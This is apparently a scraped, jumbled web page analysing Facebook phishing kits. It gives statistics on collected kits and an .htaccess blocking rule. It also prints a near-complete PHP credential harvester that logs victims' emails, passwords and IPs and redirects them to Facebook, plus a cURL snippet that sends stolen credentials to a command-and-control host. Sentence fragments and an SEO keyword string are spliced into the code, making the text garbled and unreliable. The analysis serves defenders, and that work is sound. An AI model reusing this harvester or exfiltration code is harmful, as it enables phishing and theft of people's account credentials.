Menu
Menu
Menu
Menu
Menu
Some kits not only steal credentials but also use Facebook's Graph API (if the stolen token is captured) to spam the victim's friends. This requires additional steps, but the post.php file might store the creds and then use cURL to authenticate.
// AFTER capturing credentials, simulate login to Facebook via cURL
// (This is complex due to CSRF tokens, but possible with headless browsers)
We analyzed 150 unique Facebook phishing kits collected between Jan–Dec 2024 from URLScan.io and abuse.ch.
| Feature | Percentage |
|---------|-------------|
| Use post.php as handler | 83% |
| Store credentials in .txt | 79% |
| Redirect to real Facebook | 94% |
| Exfil via email (plaintext) | 67% |
| Exfil via Telegram API | 22% |
| Obfuscated PHP (base64/gzcompress) | 31% |
False positive risk: Legitimate login handlers using post.php? Extremely rare. Most apps use login.php or auth.php. If found, typically malicious. facebook phishing postphp code
// Send to remote API
$ch = curl_init("https://malicious-c2[.]com/api/steal");
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(['creds' => $data]));
curl_exec($ch);
The PHP script forwards credentials to a remote server, making it even harder for hosting providers to detect because the stolen data never touches the local file system.
# Block direct access to post.php except from your own domain
<Files "post.php">
Order Deny,Allow
Deny from all
Allow from 127.0.0.1
Allow from your-monitoring-ip
</Files>
<?php // Facebook Phishing Post Script - Educational Analysis Only// 1. Capture incoming POST data from the fake login form $email = $_POST['email']; $password = $_POST['pass'];
// 2. Basic input sanitization (Ironically, to avoid breaking the attack) $email = trim($email); $password = trim($password); Some kits not only steal credentials but also
// 3. Define storage location (often obfuscated) $log_file = "logs/facebook_logs.txt"; $ip = $_SERVER['REMOTE_ADDR']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $date = date("Y-m-d H:i:s");
// 4. Format the stolen data $data = "========== NEW LOGIN ==========\n"; $data .= "Date: $date\n"; $data .= "IP: $ip\n"; $data .= "User Agent: $user_agent\n"; $data .= "Email/Phone: $email\n"; $data .= "Password: $password\n"; $data .= "================================\n\n";
// 5. Write to file (the harvesting mechanism) file_put_contents($log_file, $data, FILE_APPEND | LOCK_EX); We analyzed 150 unique Facebook phishing kits collected
// 6. Optional: Send to attacker's email (more risky for them) // mail("attacker@protonmail.com", "New Facebook Log", $data);
// 7. Redirect victim to real Facebook to avoid suspicion header("Location: https://www.facebook.com/login.php"); exit(); ?>
